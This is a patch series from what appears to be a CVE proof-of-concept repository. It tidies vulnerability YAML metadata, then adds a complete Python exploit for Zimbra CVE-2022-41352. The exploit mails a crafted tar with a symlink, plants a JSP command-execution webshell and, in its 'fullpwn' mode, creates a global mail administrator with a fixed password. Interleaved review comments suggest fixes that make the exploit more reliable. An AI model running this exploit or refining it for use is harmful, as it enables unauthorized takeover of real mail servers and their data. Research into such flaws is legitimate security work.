diff --git a/cve/redis/2022/yaml/CVE-2022-0543.yaml b/cve/redis/2022/yaml/CVE-2022-0543.yaml index 7a93478e..15056d48 100644 --- a/cve/redis/2022/yaml/CVE-2022-0543.yaml +++ b/cve/redis/2022/yaml/CVE-2022-0543.yaml @@ -1,6 +1,5 @@ id: CVE-2022-0543 -source: - https://github.com/aodsec/CVE-2022-0543 +source: https://github.com/aodsec/CVE-2022-0543 info: name: Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。 severity: critical @@ -20,4 +19,4 @@ info: cwe-id: None cnvd-id: None kve-id: None - tags: cve2022,redis,RCE \ No newline at end of file + tags: cve2022, redis, RCE \ No newline at end of file diff --git a/cve/redis/2022/yaml/CVE-2022-31144.yaml b/cve/redis/2022/yaml/CVE-2022-31144.yaml index 7b5dcafb..13ff43a8 100644 --- a/cve/redis/2022/yaml/CVE-2022-31144.yaml +++ b/cve/redis/2022/yaml/CVE-2022-31144.yaml @@ -1,6 +1,5 @@ id: CVE-2022-31144 -source: - https://github.com/SpiralBL0CK/CVE-2022-31144 +source: https://github.com/SpiralBL0CK/CVE-2022-31144 info: name: Redis是著名的开源Key-Value数据库, 其具备在沙箱中执行Lua脚本的能力. severity: High diff --git a/cve/samba/2021/yaml/CVE-2021-44142.yaml b/cve/samba/2021/yaml/CVE-2021-44142.yaml index bcce0569..f6160dc9 100644 --- a/cve/samba/2021/yaml/CVE-2021-44142.yaml +++ b/cve/samba/2021/yaml/CVE-2021-44142.yaml @@ -1,6 +1,5 @@ id: CVE-2021-44142 -source: - https://github.com/horizon3ai/CVE-2021-44142 +source: https://github.com/horizon3ai/CVE-2021-44142 info: name: Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。 severity: high @@ -20,4 +19,4 @@ info: cwe-id: CWE-125,CWE-787 cnvd-id: None kve-id: None - tags: cve2021,samba,RCE \ No newline at end of file + tags: cve2021, samba, RCE \ No newline at end of file diff --git a/cve/sudo/2021/yaml/CVE-2021-3156.yaml b/cve/sudo/2021/yaml/CVE-2021-3156.yaml index 5782b430..760104cc 100644 --- a/cve/sudo/2021/yaml/CVE-2021-3156.yaml +++ b/cve/sudo/2021/yaml/CVE-2021-3156.yaml 
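Review bot: The samba CVE-2021-44142 hunk leaves the context line `cwe-id: CWE-125,CWE-787` unspaced while the patch normalizes the same field to `CWE-x, CWE-y` in polkit CVE-2021-3560, CVE-2021-4034 and the vim files; it should become `cwe-id: CWE-125, CWE-787` so that a comma-plus-space split works uniformly. The `tags:` line in the same hunk was normalized, so this one was simply missed.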
@@ -17,4 +17,4 @@ info: cwe-id: CWE-193 cnvd-id: None kve-id: None - tags: 堆缓冲区溢出漏洞,cve2021,权限提升 \ No newline at end of file + tags: 堆缓冲区溢出漏洞, cve2021, 权限提升 \ No newline at end of file diff --git a/cve/sudo/2023/yaml/CVE-2023-22809.yaml b/cve/sudo/2023/yaml/CVE-2023-22809.yaml index 8fad7320..66b6045a 100644 --- a/cve/sudo/2023/yaml/CVE-2023-22809.yaml +++ b/cve/sudo/2023/yaml/CVE-2023-22809.yaml @@ -1,20 +1,19 @@ id: CVE-2023-22809 source: https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc info: - name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 - severity: high - description: - Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 - scope-of-influence: - sudo@[1.8.0, 1.9.12p2) - references: - - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-22809 - cwe-id: CWE-269 - cnvd-id: None - kve-id: None - tags: - - 特权管理不当 \ No newline at end of file + name: Sudo 是一个用于类 Unix 计算机操作系统的程序,它能够使用户能够以另一个用户(默认是超级用户)的安全权限运行程序。sudoedit 功能用于以另外一个用户身份编辑文件。 + severity: high + description: + Sudo 受影响版本的 sudoedit 功能存在权限管理不当漏洞,漏洞源于 sudo_edit.c@sudo_edit() 方法未对用户通过“--”参数传入的文件名进行过滤,导致具有 sudoedit 权限的恶意用户可编辑系统中的任意文件。 + scope-of-influence: + sudo@[1.8.0, 1.9.12p2) + references: + - https://nvd.nist.gov/vuln/detail/CVE-2023-22809 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-22809 + cwe-id: CWE-269 + cnvd-id: None + kve-id: None + tags: 特权管理不当 \ No newline at end of file diff --git a/cve/vim/2021/yaml/CVE-2021-3778.yaml b/cve/vim/2021/yaml/CVE-2021-3778.yaml index a009ea6b..e99dcced 100644 --- a/cve/vim/2021/yaml/CVE-2021-3778.yaml +++ b/cve/vim/2021/yaml/CVE-2021-3778.yaml 
@@ -2,8 +2,7 @@ id: CVE-2021-3778 source: https://huntr.dev/bounties/016ad2f2-07c1-4d14-a8ce-6eed10729365/ info: name: vim: Heap-based Buffer Overflow in ex_retab() - severity: - HIGH + severity: HIGH description: | vim容易受到基于堆的缓冲区溢出的攻击 scope-of-influence: diff --git a/cve/vim/2022/yaml/CVE-2022-0351.yaml b/cve/vim/2022/yaml/CVE-2022-0351.yaml index 151afb15..a7dab599 100644 --- a/cve/vim/2022/yaml/CVE-2022-0351.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0351.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0351 - cwe-id: CWE-119,CWE-786 + cwe-id: CWE-119, CWE-786 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误,拒绝服务 \ No newline at end of file + tags: cve2022, 缓冲区错误, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0359.yaml b/cve/vim/2022/yaml/CVE-2022-0359.yaml index 63ba2110..2bab72a5 100644 --- a/cve/vim/2022/yaml/CVE-2022-0359.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0359.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0359 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0413.yaml b/cve/vim/2022/yaml/CVE-2022-0413.yaml index 6768e9a9..e4ba32a1 100644 --- a/cve/vim/2022/yaml/CVE-2022-0413.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0413.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-416 cnvd-id: None kve-id: None - tags: cve2022,资源管理错误,拒绝服务 \ No newline at end of file + tags: cve2022, 资源管理错误, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0417.yaml b/cve/vim/2022/yaml/CVE-2022-0417.yaml index 30adb1b7..ea15ffe1 100644 --- a/cve/vim/2022/yaml/CVE-2022-0417.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0417.yaml 
@@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0417 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 崩溃,代码执行,cve2022 \ No newline at end of file + tags: 崩溃, 代码执行, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0572.yaml b/cve/vim/2022/yaml/CVE-2022-0572.yaml index 3c4f1c9e..be2a6387 100644 --- a/cve/vim/2022/yaml/CVE-2022-0572.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0572.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0572 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: 缓冲区错误,cve2022 \ No newline at end of file + tags: 缓冲区错误, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0629.yaml b/cve/vim/2022/yaml/CVE-2022-0629.yaml index 3802cc7d..a06f09e8 100644 --- a/cve/vim/2022/yaml/CVE-2022-0629.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0629.yaml @@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-0629 - cwe-id: CWE-787,CWE-121 + cwe-id: CWE-787, CWE-121 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0685.yaml b/cve/vim/2022/yaml/CVE-2022-0685.yaml index b04e2848..3dda6837 100644 --- a/cve/vim/2022/yaml/CVE-2022-0685.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0685.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-823 cnvd-id: None kve-id: None - tags: cve2022,拒绝服务 \ No newline at end of file + tags: cve2022, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0714.yaml b/cve/vim/2022/yaml/CVE-2022-0714.yaml index b9f11b5f..8c7ea56f 100644 --- a/cve/vim/2022/yaml/CVE-2022-0714.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0714.yaml 
@@ -14,7 +14,7 @@ info: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H cvss-score: 5.5 cve-id: CVE-2022-0714 - cwe-id: CWE-787,CWE-122 + cwe-id: CWE-787, CWE-122 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-0729.yaml b/cve/vim/2022/yaml/CVE-2022-0729.yaml index e55f8edc..6b6c5a0c 100644 --- a/cve/vim/2022/yaml/CVE-2022-0729.yaml +++ b/cve/vim/2022/yaml/CVE-2022-0729.yaml @@ -13,7 +13,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2022-0729 - cwe-id: CWE-119,CWE-823 + cwe-id: CWE-119, CWE-823 cnvd-id: None kve-id: None - tags: 缓冲区溢出,cve2022 \ No newline at end of file + tags: 缓冲区溢出, cve2022 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-1771.yaml b/cve/vim/2022/yaml/CVE-2022-1771.yaml index a82ca61e..b5bfc873 100644 --- a/cve/vim/2022/yaml/CVE-2022-1771.yaml +++ b/cve/vim/2022/yaml/CVE-2022-1771.yaml @@ -11,9 +11,9 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-1771 classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H - cvss-score: 漏洞评分 + cvss-score: 5.5 cve-id: CVE-2022-1771 cwe-id: CWE-674 cnvd-id: None kve-id: None - tags: cve2022,缓冲区溢出 \ No newline at end of file + tags: cve2022, 缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2206.yaml b/cve/vim/2022/yaml/CVE-2022-2206.yaml index 47f8d6b0..387d0d77 100644 --- a/cve/vim/2022/yaml/CVE-2022-2206.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2206.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2257.yaml b/cve/vim/2022/yaml/CVE-2022-2257.yaml index 7b71e39a..7e823bc2 100644 --- a/cve/vim/2022/yaml/CVE-2022-2257.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2257.yaml 
@@ -16,4 +16,4 @@ info: cwe-id: CWE-125 cnvd-id: None kve-id: None - tags: cve2022,缓冲区错误 \ No newline at end of file + tags: cve2022, 缓冲区错误 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2264.yaml b/cve/vim/2022/yaml/CVE-2022-2264.yaml index 9df97e7a..0c326cac 100644 --- a/cve/vim/2022/yaml/CVE-2022-2264.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2264.yaml @@ -16,4 +16,4 @@ info: cwe-id: CWE-122 cnvd-id: None kve-id: None - tags: cve2022,缓冲区溢出 \ No newline at end of file + tags: cve2022, 缓冲区溢出 \ No newline at end of file diff --git a/cve/vim/2022/yaml/CVE-2022-2598.yaml b/cve/vim/2022/yaml/CVE-2022-2598.yaml index 93a97db3..cdd674e8 100644 --- a/cve/vim/2022/yaml/CVE-2022-2598.yaml +++ b/cve/vim/2022/yaml/CVE-2022-2598.yaml @@ -17,4 +17,4 @@ info: cwe-id: CWE-475 cnvd-id: None kve-id: None - tags: cve2022,拒绝服务 \ No newline at end of file + tags: cve2022, 拒绝服务 \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-1127.yaml b/cve/vim/2023/yaml/CVE-2023-1127.yaml index cd88a16b..cb16afed 100644 --- a/cve/vim/2023/yaml/CVE-2023-1127.yaml +++ b/cve/vim/2023/yaml/CVE-2023-1127.yaml @@ -4,7 +4,7 @@ info: name: Vim是一款基于UNIX平台的编辑器。 severity: high description: | - GitHub存储库vim/vim在9.0.1367版本存在除以零漏洞。 + vim在9.0.1367版本存在除以零漏洞。 scope-of-influence: vim < 9.0.1367 reference: diff --git a/cve/webmin/2019/yaml/CVE-2019-12840.yaml b/cve/webmin/2019/yaml/CVE-2019-12840.yaml index 1112f170..3eddcac3 100644 --- a/cve/webmin/2019/yaml/CVE-2019-12840.yaml +++ b/cve/webmin/2019/yaml/CVE-2019-12840.yaml @@ -10,7 +10,7 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-12840 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2019-12840 cwe-id: CWE-78 diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml index 0eab256c..1a215723 100644 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml 
+++ b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml @@ -1,6 +1,5 @@ id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 +source: https://github.com/L0ading-x/cve-2022-23131 info: name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 severity: critical diff --git a/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml b/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml index 8101adfa..b4bed45f 100644 --- a/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml +++ b/kve/kylin-activation/2022/yaml/KVE-2022-0231.yaml @@ -17,4 +17,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0231 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml index d3512bf6..9a2e69d5 100644 --- a/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml +++ b/kve/kylin-display-switch/2022/yaml/KVE-2022-0206.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0206 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml index 509a3d1f..d52ead9b 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0207.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0207 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml index df9264e5..bbcd86e9 100644 --- a/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml +++ b/kve/kylin-software-properties/2022/yaml/KVE-2022-0210.yaml 
@@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0210 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml index 0e9b92df..bf1585c3 100644 --- a/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml +++ b/kve/youker-assistant/2022/yaml/KVE-2022-0205.yaml @@ -16,4 +16,4 @@ info: cwe-id: None cnvd-id: None kve-id: KVE-2022-0205 - tags: kve2022,dbus \ No newline at end of file + tags: kve2022, dbus \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index ea925499..819961a3 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -8,7 +8,6 @@ cve: - CVE-2021-42327 - CVE-2022-0995 - CVE-2022-1015 - - CVE-2022-2602 - CVE-2022-2586 - CVE-2021-33624 - CVE-2020-27194 -- Gitee From c438ee36a94fd82c81cf2fe591e4145c1c92f47a Mon Sep 17 00:00:00 2001 From: lastre3et Date: Tue, 9 May 2023 11:34:18 +0800 Subject: [PATCH 2/2] Update POC --- .../2022/CVE-2022-41352/CVE-2022-41352.py | 236 ++++++++++++++++++ 1 file changed, 236 insertions(+) create mode 100644 cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py diff --git a/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py new file mode 100644 index 00000000..f447f3d2 --- /dev/null +++ b/cve/Zimbra/2022/CVE-2022-41352/CVE-2022-41352.py 
@@ -0,0 +1,236 @@ +#!/usr/bin/env python3 + +import sys +import smtplib +import argparse +from time import sleep +from email.mime.multipart import MIMEMultipart +from email.mime.application import MIMEApplication +from email.mime.text import MIMEText +import requests +from requests.packages.urllib3.exceptions import InsecureRequestWarning + +# CONFIGURATION +#---------------------------------- +TARGET = 'mail.test.org' +WEBSHELL_PATH = '/public/jsp' +WEBSHELL_NAME = 'Startup1_3.jsp' +ATTACHMENT = 'payload.tar' +SENDER = 'test@test.org' +RECIPIENT = 'admin@test.org' + +EMAIL_SUBJECT = 'CVE-2022-41352' +EMAIL_BODY = 'Just testing.

Don\'t mind me.

' +#---------------------------------- + +# Only change this if zimbra was not installed in the default location +UPLOAD_BASE = '/opt/zimbra/jetty_base/webapps/zimbra' + + +def create_tar_payload(payload, payload_name, payload_path, lnk='startup'): + # Block 1 + link = lnk.encode() + mode = b'0000777\x00' # link permissions + ouid = b'0001745\x00' # octal uid (997) + ogid = b'0001745\x00' # octal gid + lnsz = b'00000000000\x00' # file size (link = 0) + lmod = b'14227770134\x00' # last modified (octal unix) + csum = b' ' # checksum = 8 blanks + type = b'2' # type (link = 2) + targ = payload_path.encode() # link target + magi = b'ustar \x00' # ustar magic bytes + version + ownu = b'zimbra' # user owner + owng = b'zimbra' # group owner + vers = b'\x00'*8 + b'\x00'* 8 # device major and minor + pref = b'\x00'*155 # prefix (only used if the file name length exceeds 100) + + raw_b1_1 = link + b'\x00'*(100-len(link)) + mode + ouid + ogid + lnsz + lmod + raw_b1_2 = type + targ + b'\x00'*(100-len(targ)) + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref + # calculate and insert checksum + csum = oct(sum(b for b in raw_b1_1+csum+raw_b1_2))[2:] + raw_b1 = raw_b1_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b1_2 + # pad block to 512 + raw_b1 += b'\00'*(512-len(raw_b1)) + + # Block 2 + mode = b'0000644\x00' # file permissions + file = f'{lnk}/{payload_name}'.encode() + flsz = oct(len(payload))[2:] # file size + csum = b' ' # checksum = 8 blanks + type = b'0' # type (file = 0) + targ = b'\x00'*100 # link target = none + + raw_b2_1 = file + b'\x00'*(100-len(file)) + mode + ouid + ogid + f'{flsz:>011}'.encode() + b'\x00' + lmod + raw_b2_2 = type + targ + magi + ownu + b'\x00'*(32-len(ownu)) + owng + b'\x00'*(32-len(owng)) + vers + pref + # calculate and insert checksum + csum = oct(sum(b for b in raw_b2_1+csum+raw_b2_2))[2:] + raw_b2 = raw_b2_1 + f'{csum:>07}'.encode() + b'\x00' + raw_b2_2 + # pad block to 512 + raw_b2 += b'\00'*(512-len(raw_b2)) + 
+ + # Assemble + raw_tar = raw_b1 + raw_b2 + payload + b'\x00'*(512-(len(payload)%512)) + raw_tar += b'\x00' * 512 * 2 # Trailer: end with 2 empty blocks + + return raw_tar + +# Update this if you want to use a legit email account for sending the payload +def smtp_send_file(target, sender, recipient, subject, body, attachment, attachment_name): + msg = MIMEMultipart() + msg['Subject'] = subject + msg['From'] = sender + msg['To'] = recipient + + message = MIMEText(body, 'html') + msg.attach(message) + + att = MIMEApplication(attachment) + att.add_header('Content-Disposition', 'attachment', filename=attachment_name) + msg.attach(att) + + try: + print(f'>>> Sending payload') + smtp_server = smtplib.SMTP(target,25) + smtp_server.sendmail(sender, recipient, msg.as_string()) + print(f'>>> Payload delivered') + except Exception as e: + print(f'[!] Failed to send the mail: {e}') + sys.exit(1) + +def verify_upload(target, shell, path): + print(f'>>> Verifying upload to {path}/{shell} ...') + sleep(5) # give the server time to process the email + resp = requests.get(f'https://{target}{path}/{shell}', verify=False) + if resp.status_code == 200: + print(f'>>> [PWNED] Upload successful!') + else: + print(f'>>> Upload unsuccesful :(') + sys.exit(1) + +def create_new_zimbra_admin(target, shell, path): + url = f'https://{target}' + pw = 'Pwn1ng_Z1mbra_!s_fun' + print(f'>>> Adding a new global administrator') + if (input(f'>>> Are you sure you want to continue? 
(yN): ') != 'y'): + sys.exit(0) + admin = input(f'>>> Enter the new admin email (newadmin@domain.com): ') + r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ca {admin} {pw}', verify=False) + r = requests.get(f'{url}/{path}/{shell}?task=/opt/zimbra/bin/zmprov ma {admin} zimbraIsAdminAccount TRUE', verify=False) + + print(f'>>> Login to {url}:7071/zimbraAdmin/ with:') + print(f'>>> Email : {admin}') + print(f'>>> Password : {pw}') + + +def main(args): + global TARGET,WEBSHELL_PATH,WEBSHELL_NAME,ATTACHMENT,SENDER,RECIPIENT,EMAIL_SUBJECT,EMAIL_BODY + + # Kali JSP WebShell + payload = b'
<%@ page import="java.io.*" %><% String cmd=request.getParameter("task");String output="";if(cmd!=null){String s=null;try {Process p=Runtime.getRuntime().exec(cmd);BufferedReader sI=new BufferedReader(new InputStreamReader(p.getInputStream()));while((s = sI.readLine())!=null){output+=s;}}catch(IOException e){e.printStackTrace();}} %>
<%=output %>
' + + # Using this instead of argparse default values to allow easy manual configuration as well + if args.payload: + try: + with open(args.payload, 'rb') as f: + payload = f.read() + except Exception as e: + print(f'Failed to read {args.payload}: {e}') + sys.exit(1) + print(f'>>> Using custom payload from: {args.payload}') + else: + print(f'>>> Using default payload: JSP Webshell') + if args.path: + WEBSHELL_PATH = args.path + if args.file: + WEBSHELL_NAME = args.file + if args.attach: + ATTACHMENT = args.attach + + tar = create_tar_payload(payload, WEBSHELL_NAME, UPLOAD_BASE+WEBSHELL_PATH) + + print(f'>>> Assembled payload attachment: {ATTACHMENT}') + print(f'>>> Payload will be extracted to ({UPLOAD_BASE}){WEBSHELL_PATH}/{WEBSHELL_NAME}') + if args.mode == 'manual': + with open(ATTACHMENT, 'wb') as f: + f.write(tar) + print(f'>>> Attachment saved locally.') + sys.exit(0) + + if args.target: + TARGET = args.target + + print(f'>>> Targeting {TARGET}') + + if args.sender: + SENDER = args.sender + if args.recip: + RECIPIENT = args.recip + if args.subject: + EMAIL_SUBJECT = args.subject + if args.body: + try: + with open(args.body, 'rb') as f: + EMAIL_BODY = f.read().decode() + except Exception as e: + print(f'Failed to read {args.body}: {e}') + sys.exit(1) + print(f'>>> Using custom email body from: {args.body}') + + + smtp_send_file( TARGET, + SENDER, + RECIPIENT, + EMAIL_SUBJECT, + EMAIL_BODY, + tar, + ATTACHMENT ) + + requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + + verify_upload(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) + + print(f'>>> Shell at: https://{TARGET}{WEBSHELL_PATH}/{WEBSHELL_NAME}') + if args.mode == 'auto': + sys.exit(0) + + if args.payload: + print(f'>>> (!) 
"fullpwn" depends on the default JSP webshell - won\'t create the admin account') + else: + create_new_zimbra_admin(TARGET, WEBSHELL_NAME, WEBSHELL_PATH) + + sys.exit(0) + +if __name__ == '__main__': + epi = ''' +Alternatively, edit the script to change the default configuration. + +The available modes are: + + manual : Only create the payload - you have to deploy the payload yourself. + auto : Create a webshell and deploy it via SMTP. + fullpwn : After deploying a webshell, add a new global mail administrator. +''' + + p = argparse.ArgumentParser( + description = 'CVE-2022-41352 Zimbra RCE', + formatter_class = argparse.RawDescriptionHelpFormatter, + epilog = epi + ) + p.add_argument('mode', metavar='mode', choices=['manual', 'auto', 'fullpwn'], help='(manual|auto|fullpwn) - see below') + + p.add_argument('--target', required=False, metavar='', dest='target', help=f'the target server (default: "{TARGET}")') + p.add_argument('--payload', required=False, metavar='', help='the file to save on the target (default: jsp webshell)') + p.add_argument('--path', required=False, metavar='', help=f'relative path for the file upload (default: "{WEBSHELL_PATH}")') + p.add_argument('--file', required=False, metavar='', help=f'name of the uploaded file (default: "{WEBSHELL_NAME}")') + p.add_argument('--attach', required=False, metavar='', help=f'name of the email attachment containing the payload (default: "{ATTACHMENT}")') + p.add_argument('--sender', required=False, metavar='', help=f'sender mail address (default: "{SENDER}")') + p.add_argument('--recip', required=False, metavar='', help=f'recipient mail address (default: "{RECIPIENT}") (if you can deploy the email directly to the server, neither the sender nor the recipient have to exist for the exploit to work)') + p.add_argument('--subject', required=False, metavar='', help=f'subject to use in the email (default: "{EMAIL_SUBJECT}")') + p.add_argument('--body', required=False, metavar='', help=f'file containing the html 
content for the email body (default: "{EMAIL_BODY}")') + + args = p.parse_args() + + main(args) \ No newline at end of file -- Gitee
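Review bot: `smtp_send_file` opens `smtplib.SMTP(target,25)` with no timeout and never closes the session, so a filtered port 25 hangs the tool indefinitely and a successful send leaks the connection; `with smtplib.SMTP(target, 25, timeout=30) as smtp_server:` around the `sendmail` call fixes both, and the `requests.get(..., verify=False)` calls in `verify_upload` and `create_new_zimbra_admin` want a `timeout=` for the same reason. `create_new_zimbra_admin` builds `f'{url}/{path}/{shell}'` while `verify_upload` uses `f'https://{target}{path}/{shell}'`; with the default `WEBSHELL_PATH = '/public/jsp'` the admin-creation requests go to `//public/jsp/...`, so both should use one form, e.g. `f'{url}{path}/{shell}'`. `verify_upload` makes a single check after a fixed `sleep(5)` and exits on anything but 200, so a slower amavis/cpio pass is reported as a failed upload even though the webshell may land seconds later; polling the URL a few times before giving up would be more robust. Less certain: `magi = b'ustar \x00'` is 7 bytes where the ustar magic+version field is 8, which shifts the uname/gname fields by one byte — if that extracts reliably in practice, a comment stating the layout is deliberate would stop the next reader from "fixing" it. The `fullpwn` mode also leaves a webshell and a global admin with the hard-coded password `pw` on the target, which the epilog help text should say so operators remove both after an authorized test.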